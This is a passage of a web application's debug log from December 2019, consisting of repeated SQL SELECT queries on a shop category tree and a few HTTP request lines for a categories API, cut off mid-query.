(0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:23:10,977 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:23:10,981 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:23:10,985 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:23:10,990 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:23:10,995 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:23:10,999 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:23:11,003 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:23:11,008 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:23:11,013 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:23:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:23:11,422 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:23:11,433 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:23:11,439 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:23:11,443 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:23:11,449 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:23:11,453 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:23:11,457 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:23:11,461 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:23:11,466 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:23:11,472 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:23:11,476 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:23:11,480 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:23:11,483 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:23:11,487 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:23:11,493 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:23:11,497 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:23:11,501 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:23:11,504 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:23:11,508 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:23:11,514 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:23:11,518 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:23:11,522 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:23:11,526 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:23:11,530 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:23:11,534 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:23:11,539 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:23:11,543 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:23:11,547 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:23:11,551 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:23:11,555 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:23:11,561 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:23:11,565 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:23:11,569 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:23:11,572 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:23:11,576 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:23:11,581 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:23:11,583 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:23:11,585 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:23:11,588 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:23:11,590 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:23:11,592 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:23:11,595 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:23:11,597 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:23:11,599 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:23:11,602 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:23:11,604 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:23:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:23:11,702 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2019-12-20 07:23:11,709 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) [20/Dec/2019 07:23:11] "GET /api/v1/categories/15 HTTP/1.0" 200 223 [20/Dec/2019 07:25:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 07:29:57,178 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:29:57,185 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:29:57,192 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:29:57,195 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:29:57,199 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:29:57,202 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:29:57,204 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:29:57,207 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:29:57,209 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:29:57,212 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 